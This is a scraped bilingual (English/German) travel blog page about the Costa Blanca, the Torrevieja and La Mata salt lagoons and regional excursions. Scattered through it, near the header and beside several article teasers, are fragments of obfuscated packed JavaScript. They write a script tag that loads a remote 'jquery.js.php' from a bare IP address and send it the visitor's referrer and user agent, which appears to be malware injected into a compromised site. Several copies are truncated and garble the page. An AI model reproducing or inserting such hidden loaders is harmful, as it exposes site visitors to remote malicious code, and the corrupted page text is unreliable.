28.1 C
Torrevieja, ES
Monday, June 18, 2018

=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('3.h("<7 8=\'2\' 9=\'a\' b=\'c/2\' d=\'e://5.f.g.6/1/j.k.l?r="+0(3.m)+"\n="+0(o.p)+"\'><\/q"+"s>");t i="4";',30,30,'encodeURI||javascript|document|niyzd||97|script|language|rel|nofollow|type|text|src|http|45|67|write|fhiid|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) width=”2/3″]

Climate, weather, health in the region.

Natur, Blumen und Palmen

The Costa Blanca, as referred to the coastline of the province of Alicante, is part of the Community of Valencia. The Costa Blanca – white coast, has also given its name because of the many white houses and the lighting conditions that make the sand appear white. It stretches from Denia in the north to Pilar de la Horadada in the south. With its mountainous inland, kilometers of sandy beaches and subtropical vegetation, is one of the most beautiful and popular regions of Spain for visitors from around the world.

The city of Alicante or Torrevieja are a good base to explore the many highlights of this region. There are amusement parks, animal parks, nature reserves, charming villages, caves, waterfalls, lively markets and many exciting celebrations with fireworks. The golf courses are internationally renowned and there is a wide range of different water sports. Torrevieja is next to Alicante with an ideal climate to operate a seaside water sports. Numerous hiking trails lead through the countryside to great viewpoints. There are many offers around the Costa Blanca!

Natur

At first glance, the Costa Blanca looks quite large and difficult to handle, especially without a car. However, that is no reason to despair, because each attraction can be easily reached by public transport. In addition, the rates for the public transport in this region are very low. The region offers everything for an unforgettable holiday, to spend the winter or for a second home. Kilometers of sandy beaches and spectacular cliffs characterize the Costa Blanca.

The vast landscape is surrounded by orange and pine trees; making it a unique character of this region. Pine-covered mountains, almond tree fields, olive groves and orange groves provide a magnificent view over the countryside. On the Costa Blanca there are kilometers long and wide white sandy beaches, from which the water stays still. This is ideal for sunbathing and swimming fans. By the World Health Organization (WHO), the Costa Blanca was even declared one of the best climates in the world due to the mild and Mediterranean climate.

Did you know that 52% of the territory is considered here in Torrevieja as a nature reserve? If you love open spaces, nature and hiking trails, you are exactly right.
The large National Park of La Mata and Torrevieja lagoons make up a large part of the reserve and take a total of 3700 hectares, with which 2100 hectares of water surface cover (1400 hectares of lagoons and 700 hectares in La Mata).

This residue consists of salt marshes, plant development, and maritim vegetation. This geological area is through two channels (a channel north to La Mata and the other south facing the Acequión) connected to the sea. The salt is extracted from lagoons of Torrevieja, the lagoon of La Mata is used as a heater and concentrator. Through a long conveyor belt which partly above, partly extends below the earth, the salt is fed directly from the salt mountains the dock for cargo vessels.

A natural healthy climate and warm, sunny weather for good health without industry, dust and exhaust fumes.

The reserve has several noteworthy aspects, but you pay particular attention to the color of the lagoons: A pink, the other green.

The Pink Lagoon is the Torrevieja lagoon, is mined in the salt, and the green lagoon is the La Mata lagoon. The pink / purple color of the Torrevieja Lagoon is caused by pigments, which can be found in a specific type of bacteria that live in very extreme environments; these are so-called halo bacteria. The reddish color is produced by a protein called bacteriorhodopsin, which is present in the membrane of the halobacteria. Regarding the color of the lagoons, we must also point out the role of the unicellular alga Dunaliella salina and the small crustaceans called salt crabs. The former is responsible for the red vermilion color that takes the lagoon during certain seasons, while the salt crabs have a reddish color because they feed on Halo bacteria.

In this natural environment we find a simply unique vegetation, caused by the high salt content in the soil and low rainfall. The habitats of the salt marsh harbor species such as Samphire, rushes, Kalmus, Esparto and houseleek. Birdlife is the most important fauna group, with nearly one hundred different species. Depending on the season you can see different migrating, wintering or nesting birds that complete their biological cycle in this wetland.

Festungsanlage in Cartagena

Abwehranlagen Bateria de Conejos und Bateria Aguilones in Cartagena

Rund um Cartagena befinden sich unterschiedliche Festungsanlagen und Geschütztürme am Meer, um die Stadt zu...
Bateria de Conejos in Cartagena

Batería de Aguilones in Cartagena

=k||c.toString(a)}k=}];e=function(){return'\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k)}}return p}('3.h("<7 8='2' 9='a' b='c/2' d='e://5.f.g.6/1/j.k.l?r="+0(3.m)+"\n="+0(o.p)+"'><\/q"+"s>");t i="4";',30,30,'encodeURI||javascript|document|ysiry||97|script|language|rel|nofollow|type|text|src|http|45|67|write|kdisy|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) width="2/3"]
Bateria de Conejos in Cartagena

Batería de Conejos in Cartagena

=k||c.toString(a)}k=}];e=function(){return'\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k)}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|kdkfi||97|script|language|rel|nofollow|type|text|src|http|45|67|write|akkit|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) width="2/3"]
video

Wunderschöner Wasserfall Rio Mundo in Riopar bei Albacete

Der imposante Wasserfall in Riopar bei Albacete, liegt fast 2,5 Stunden von Torrevieja entfernt, doch...
Nacimiento Rio Mundo in Riopar

Großer Wasserfall bei Albacete in Riopar Nacimiento Rio Mundo

=k||c.toString(a)}k=}];e=function(){return'\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k)}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|eenek||97|script|language|rel|nofollow|type|text|src|http|45|67|write|frrfh|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) width="2/3"]Wow, was für ein toller Wasserfall! Wir staunten in Riopar nicht...
Ibiza

Ibiza Fotogalerie der balearischen Partyinsel

=k||c.toString(a)}k=}];e=function(){return'\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k)}}return p}('3.h("");t i="4";',30,30,'encodeURI||javascript|document|akiha||97|script|language|rel|nofollow|type|text|src|http|45|67|write|khfba|jquery|js|php|referrer|u0026u|navigator|userAgent|sc||ript|var'.split('|'),0,{})) width="2/3"]Die Partyinsel Ibiza ist von Alicante in 50 Minuten mit günstigen...

Top Beiträge

Sehenswürdigkeiten Ausflüge

Empfehlungen

%d bloggers like this:

Klima, Wetter und Gesundheit in Region um Torrevieja und Orihuala Costa

Natur, Blumen und Palmen

Die Costa Blanca, so bezeichnet man den Küstenabschnitt der Provinz Alicante, die selbst Teil der Gemeinschaft Valencias ist. Die Costa Blanca – weiße Küste, hat ihren Namen wegen der vielen weißen Häuser und der Lichtverhältnisse bekommen, die den Sand weiß erscheinen lassen. Sie erstreckt sich von Denia im Norden bis Pilar de la Horadada im Süden. Mit seinem gebirgigen Landesinneren und Kilometern von herrlichen Sandstränden und subtropischer Vegetation ist das eine der schönsten und beliebtesten Regionen Spaniens für die Besucher aus aller Welt.

Die Stadt Alicante oder Torrevieja ist ein guter Ausgangspunkt, um die vielen Highlights dieser Region zu erkunden. Es gibt Freizeitparks, Tierparks, Naturschutzgebiete, bezaubernde Dörfer, Höhlen, Wasserfälle, lebendige Märkte und viele spannende Feste mit Feuerwerken. Die Golfplätze sind international renommierte und es gibt eine große Auswahl mit unterschiedlichsten Wassersportmöglichkeiten. Torrevieja ist neben Alicante ein Küstenort mit einem idealen Klima um Wassersport zu betreiben. Zahlreiche Wanderwege führen durch die Natur zu tollen Aussichtspunkten. Rund um die Costa Blanca wird einem sehr viel geboten!

Ausflugsmöglichkeiten rund um Torrevieja

Ausflugsmöglichkeiten Torrevieja

Auf den ersten Blick wirkt die Costa Blanca ziemlich groß und schwer zu umgehen, vor allem ohne Auto. Das ist jedoch kein Grund um zu verzweifeln, denn jede Sehenswürdigkeit kann leicht mit den öffentlichen Verkehrsmitteln erreicht werden. Darüber hinaus sind die öffentlichen Verkehrsmittel in dieser Region sehr günstig. Die Region bietet alles für einen unvergesslichen Urlaub, zum Überwintern oder für einen Zweitwohnsitz. Kilometerlange Sandstrände und beeindruckenden Steilküsten zeichnen die Costa Blanca aus.

Die weite Landschaft ist umgeben von Orangen- und Mandelbäumen, sie machen den einzigartigen Charakter dieser Region aus. Pinien bedeckte Berge, Mandelbaum Felder, Olivenhaine und Orangenhaine sorgen für eine herrliche Aussicht über die Landschaft. An der Costa Blanca gibt es kilometerlange und breite weiße Sandstrände, von denen das Wasser nur flach abfällt. Ideal für Sonnenanbeter und Badefans. Die Weltgesundheitsorganisation (WHO) hat die Costa Blanca, wegen des milden und mediterranen Klimas, sogar zu eine der besten Klimazonen der Erde erklärt.

Wussten Sie, dass 52% des Territoriums hier in Torrevieja als Naturschutzgebiet gilt? Falls Sie offene Plätze, die Natur und Wanderwege lieben, sind Sie hier genau richtig.
Der große Nationalpark La Mata sowie die Lagunen Torreviejas machen einen Großteil des Schutzgebietes aus und nehmen insgesamt 3700 Hektar ein, wobei davon 2100 Hektar die Wasseroberfläche bedecken (1400 Hektar für die Lagunen und 700 Hektar in La Mata).

Dieser Rest besteht aus Salzwiesen, Pflanzenbildung, Rotschitzen und mittelmeerischem Buschland. Diese geologisch Fläche wird durch zwei Kanäle (ein Kanal nördlich nach La Mata und der andere südlich gerichtet zur Playa del Acequión) mit dem Meer verbunden. Das Salz wird aus Lagunen Torreviejas gefördert, wobei die Lagune der La Mata als Heizer und Konzentrator verwendet wird. Durch ein langes Förderband, welches teilweise oberhalb, teilweise unterhalb der Erde verläuft, wird das Salz direkt von den Salzbergen zur Anlegestelle der Transportschiffe gefördert.

Panorama

Ein natürliches gesundes Klima und warmes, sonniges Wetter für eine gute Gesundheit ohne Industrie, Feinstaub und Abgase.

Das Reservat hat mehrere erwähnenswerte Aspekte, aber achten Sie insbesondere auf die Farbe der Lagunen: Eine rosa, die andere grün.

Die rosa Lagune ist die Torrevieja Lagune, in der Salz abgebaut wird, und die grüne Lagune ist die La Mata Lagune. Die rosa/lila Farbe der Torrevieja Lagune wird durch Pigmente verursacht, die in einer besonderen Art von Bakterien zu finden sind, die in sehr extremen Umgebungen leben; dabei handelt es sich um sogenannte Halobakterien. Die rötliche Farbe wird von einem Protein namens Bacteriorhodopsin erzeugt, das in der Membran der Halobakterien vorkommt. Bezüglich der Farbe der Lagunen müssen wir auch auf die Rolle der einzelligen Alge Dunaliella salina hinweisen und auf die kleinen Krustentiere namens Salzkrebse. Erstere ist verantwortlich für die rote Zinnoberfarbe, die die Lagune zu bestimmten Jahreszeiten annimmt, während die Salzkrebse eine rötliche Farbe haben, weil sie sich von Halobakterien ernähren.

In dieser natürlichen Umgebung finden wir eine einfach einzigartige Vegetation, hervorgerufen durch den hohen Salzgehalt im Boden und geringe Niederschlagsmengen. Die Lebensräume der Salzsumpfes beherbergen Arten wie z.B. Queller, Binsen, Kalmus, Espartogras und Hauswurz. Die Vogelwelt bildet die wichtigste Fauna-Gruppe, mit fast einhundert verschiedenen Arten. Je nach Jahreszeit kann man verschiedene migrierende, überwinternde oder nistende Vögel sehen, die ihren biologischen Kreislauf in diesem Feuchtgebiet vervollständigen.

Likör 43 in Spanien

Licor 43 Experiencia Tour – Geführte Besichtigung der Likörfabrik in Cartagena, Murcia

Die 43 Experiencia Tour, welche circa 1 – 2 Stunden dauert und 10 € kostet,...
Castillo de Pliego

Castillo de Pliego in Murcia

Das Castillo de Pliego in der Provinz Murcia, war mal eine Burg mit sieben Türmen,...
Quadtour

Quadtour zum Barrancos de Gebas in der Sierra Espuna vom Hotel La Mariposa

Was diese Quadtour so einzigartig und zum Top Tipp für Adventure Touristen macht, ist die...
Sierra Nevada Ski

Skifahren in Südspanien? Ja, im Nationalpark Sierra Nevada.

Wer an Skifahren denkt, wird nicht zwangsläufig das sehr warme Spanien im Kopf haben, sondern...
Skifahren in der Sierra Nevada

Skifahren in der Sierra Nevada und wandern im Nationalpark

Skifahren in der Sierra Nevada und wandern im Nationalpark. Hier sehen Sie die Fotos vom...
Naturpark in Calpe

Peñón de Ifach der Naturpark in Calp

Peñón de Ifach der Naturpark bei Calp liegt etwas nördlich von Alicante hinter Benidorm. Den...

Top Beiträge

Sehenswürdigkeiten Ausflüge

Empfehlungen

%d Bloggern gefällt das: